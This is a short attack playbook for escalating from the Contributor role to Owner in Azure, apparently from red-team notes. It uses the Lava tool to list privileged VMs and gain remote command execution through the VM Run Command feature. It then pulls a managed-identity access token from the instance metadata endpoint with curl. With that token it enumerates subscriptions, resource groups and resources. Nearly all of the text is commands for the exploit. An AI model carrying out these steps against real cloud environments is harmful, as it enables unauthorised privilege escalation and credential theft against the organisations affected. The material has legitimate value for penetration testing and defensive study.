Exploiting privileged VM resources

Tools: Lava

Requirements: Contributor account/role access

Steps

1) Run Lava

python3 Lava.py 

2) Confirm authenticated user

Lava $> whoami 

3) List all modules

Lava $> ls 

4) Execute this specific module to list privileged VMs

Lava $> exec vm_list_privileged 

5) Exploit the Run Command functionality as a Contributor

Lava $> exec vm_rce -rgrp RESOURCE_GROUP -vm_name PRIVILEGED_VM 

6) In the shell, obtain an access token for the resource manager that can be used to make API calls with the owner privileges

curl 'http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com' -H Metadata:true 

7) Copy the "access_token" value, then press exit to return to the Lava console, then exit again.

Use the token to run commands against the resource manager with the owner privilege.

8) Store the access token as a variable

TOKEN="ACCESS_TOKEN_FROM_PREVIOUS_STEP" 

9) Get a list of subscriptions

curl --header "Authorization: Bearer ${TOKEN}" https://management.azure.com/subscriptions?api-version=2020-01-01 | jq 

10) Store the subscriptions ID in a variable

SUB_ID=$(curl --header "Authorization: Bearer ${TOKEN}" https://management.azure.com/subscriptions?apiversion=2020-01-01 | jq -r .value[].subscriptionId) 

11) Get a list of resource groups

curl --header "Authorization: Bearer ${TOKEN}" https://management.azure.com/subscriptions/${SUB_ID}/resourcegroups?api-version=2019-10-01 | jq 

12) Get a list of resources

curl --header "Authorization: Bearer ${TOKEN}" https://management.azure.com/subscriptions/${SUB_ID}/resources?api-version=2019-10-01 | jq 

Now we escalated from the Contributor role to the Owner role.